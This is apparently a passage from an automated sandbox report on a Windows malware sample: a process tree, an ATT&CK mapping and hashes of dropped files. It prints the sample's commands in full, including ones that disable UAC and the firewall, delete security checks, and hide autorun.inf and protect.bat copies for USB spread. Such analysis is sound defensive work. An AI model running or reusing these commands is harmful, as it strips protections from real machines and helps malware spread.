    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\3dtext.scr" /f
    3⤵
    PID:3632
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr" /f
      4⤵
      PID:4476
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
    3⤵
    PID:1668
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3700
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
    3⤵
    PID:1200
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
      4⤵
      PID:4160
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4708
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
      4⤵
      PID:3748
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"
    3⤵
    PID:2000
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +R +H "F:\autorun.inf"
      4⤵
      Sets file to hidden
      Drops autorun.inf file
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4696
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"
    3⤵
    PID:388
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +R +H "C:\autorun.inf"
      4⤵
      Sets file to hidden
      Drops autorun.inf file
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4608
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
    3⤵
    PID:1412
  - - C:\Windows\SysWOW64\reg.exe
      reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
      4⤵
      PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:2044
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      PID:636
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto
    3⤵
    PID:4784
  - - C:\Windows\SysWOW64\sc.exe
      sc config upnphost start= auto
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:4444
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2300
  - - C:\Windows\SysWOW64\sc.exe
      sc config SSDPSRV start= auto
      4⤵
      Launches sc.exe
      PID:3152
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc config browser start= auto
    3⤵
    - System Location Discovery: System Language Discovery
    PID:224
  - - C:\Windows\SysWOW64\sc.exe
      sc config browser start= auto
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:4680
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net start upnphost
    3⤵
    PID:2600
  - - C:\Windows\SysWOW64\net.exe
      net start upnphost
      4⤵
      PID:3148
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start upnphost
        5⤵
        
        PID:3080
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net start SSDPSRV
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5076
  - - C:\Windows\SysWOW64\net.exe
      net start SSDPSRV
      4⤵
      PID:4040
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start SSDPSRV
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4592
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net start browser
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4536
  - - C:\Windows\SysWOW64\net.exe
      net start browser
      4⤵
      PID:1332
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start browser
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3980
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
    3⤵
    PID:2384
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set currentprofile state off
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1448
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1724
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
      4⤵
      Modifies firewall policy service
      System Location Discovery: System Language Discovery
      PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    PID:1892
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3748
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    PID:2264
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
      4⤵
      PID:2732
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
    3⤵
    PID:700
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set currentprofile state off
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4440
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
    3⤵
    PID:2712
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      PID:60
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1840
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      PID:4680
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1200
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
      4⤵
      Modifies Internet Explorer settings
      PID:2536
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1836
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4608
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -R -H "F:\protect.bat"
      4⤵
      Views/modifies file attributes
      PID:4764
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
    3⤵
    PID:4688
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
      4⤵
      Modifies Internet Explorer settings
      PID:3692
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3540
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -R -H "C:\protect.bat"
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:3288
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
    3⤵
    PID:556
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
      4⤵
      Modifies Internet Explorer settings
      PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
    3⤵
    PID:3176
  - - C:\Windows\SysWOW64\reg.exe
      reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
      4⤵
      PID:3940
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
    3⤵
    PID:3392
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3152
  - - C:\Windows\SysWOW64\reg.exe
      reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
      4⤵
      PID:2848
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe"
    3⤵
    - Modifies Internet Explorer settings
    PID:2296
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3984
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\daemon.exe" "C:\protect.bat"
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\daemon.exe" "F:\protect.bat"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4592
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3748
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:532
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1448
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +R +H "C:\protect.bat"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2732
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"
    3⤵
    PID:324
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1332
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +R +H "F:\protect.bat"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:1724
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"
  2⤵
  PID:4064
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
  2⤵
  PID:2480
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2152
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
  2⤵
  PID:3096
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
    3⤵
    PID:116
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1892
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:4988
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto
  2⤵
  - System Location Discovery: System Language Discovery
  PID:624
- - C:\Windows\SysWOW64\sc.exe
    sc config upnphost start= auto
    3⤵
    - Launches sc.exe
    PID:3388
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto
  2⤵
  PID:5076
- - C:\Windows\SysWOW64\sc.exe
    sc config SSDPSRV start= auto
    3⤵
    - Launches sc.exe
    PID:728
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc config browser start= auto
  2⤵
  PID:4460
- - C:\Windows\SysWOW64\sc.exe
    sc config browser start= auto
    3⤵
    - Launches sc.exe
    PID:4236
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net start upnphost
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3816
- - C:\Windows\SysWOW64\net.exe
    net start upnphost
    3⤵
    PID:2600
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start upnphost
      4⤵
      PID:2324
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net start SSDPSRV
  2⤵
  PID:3968
- - C:\Windows\SysWOW64\net.exe
    net start SSDPSRV
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2848
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start SSDPSRV
      4⤵
      PID:4580
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net start browser
  2⤵
  PID:4476
- - C:\Windows\SysWOW64\net.exe
    net start browser
    3⤵
    PID:4192
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start browser
      4⤵
      PID:1420
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1508
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3652
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:856
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - Modifies firewall policy service
    PID:808
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
  2⤵
  PID:4372
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    PID:4576
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
  2⤵
  PID:1492
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2148
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:388
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4164
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
  2⤵
  PID:4044
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    PID:1824
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4688
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1360
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2260
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
  2⤵
  PID:3972
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
    3⤵
    - Modifies Internet Explorer settings
    PID:3140
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3032
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2992
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
  2⤵
  PID:3000
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
    3⤵
    PID:2964
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
  2⤵
  PID:3532
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
    3⤵
    PID:532
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe"
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:3908
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3908 CREDAT:17410 /prefetch:2
    3⤵
    - Loads dropped DLL
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:516
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3908 CREDAT:17416 /prefetch:2
    3⤵
    - Loads dropped DLL
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:548
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1524

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
1⤵
PID:4392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O8WYVOD7\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Roaming\daemon.exe

Filesize
273KB

MD5
84f755ce53cb1d70ba895c0f0f629595

SHA1
3fdf3e27b1541d52c9a865951a2bdee107c37473

SHA256
5f9f5634db8e30d9d11a63baa794863ecf4855637f95e81b6fe667d9f85cab72

SHA512
cd2cee1a1a8e4b53118b1a463fcf767a3fc72566663d16f5cbc563d79f2b9c47e4c1a60dbbd4c61faebcc1488a842783f9984433e2d52c2b5148918d3fb99de7

Download Submit
C:\Users\Admin\AppData\Roaming\rundx.dll

Filesize
187KB

MD5
3691476fc5c39dc117f5eae6c101a8f8

SHA1
cc2bc87b524e4802c86261f37d127dfb95f5f2b1

SHA256
d1bb6adf17167d1dc8fa90de52763b7c56c8964a2ce43470b405f9a76a727ad3

SHA512
9a8a2c019f0a034e6bffa03ab986374947d3fe2ae72f9029656150eb6d28b6240596ef39c4b49d22c12de757960390a77eaa733fd5f9f5dce48f2d3d47cdb850

Download Submit
C:\autorun.inf

Filesize
63B

MD5
f64baf418f685884efec59a9d80bc5f6

SHA1
9c90f7a7efd7ef3059837fdeb06b6b781ca6d1e9

SHA256
4b9870b1f52e252451b3fa099e8b270c32ddc6fc29372067be28dcd009ec4e8f

SHA512
dceecd6a564c974c71ceeb544b0dfde70a09315db6d72a50fdbecdc0cf505a7ce52b7a83a9a8c79e8cfbb996c054585da6d7c08bf0026b4d9ecdde5f0a2b2a69

Download Submit
memory/3852-24-0x00000000001B0000-0x0000000000203000-memory.dmp

Filesize
332KB

Download
memory/3852-201-0x0000000003300000-0x0000000003301000-memory.dmp

Filesize
4KB

Download
memory/3852-209-0x0000000003460000-0x0000000003493000-memory.dmp

Filesize
204KB

Download
memory/3852-449-0x00000000001B0000-0x0000000000203000-memory.dmp

Filesize
332KB

Download
memory/4036-0-0x00000000001B0000-0x0000000000203000-memory.dmp

Filesize
332KB

Download
memory/4036-1-0x0000000010000000-0x0000000010053000-memory.dmp

Filesize
332KB

Download
memory/4036-8-0x00000000001B0000-0x0000000000203000-memory.dmp

Filesize
332KB

Download
memory/4036-223-0x00000000001B0000-0x0000000000203000-memory.dmp

Filesize
332KB

Download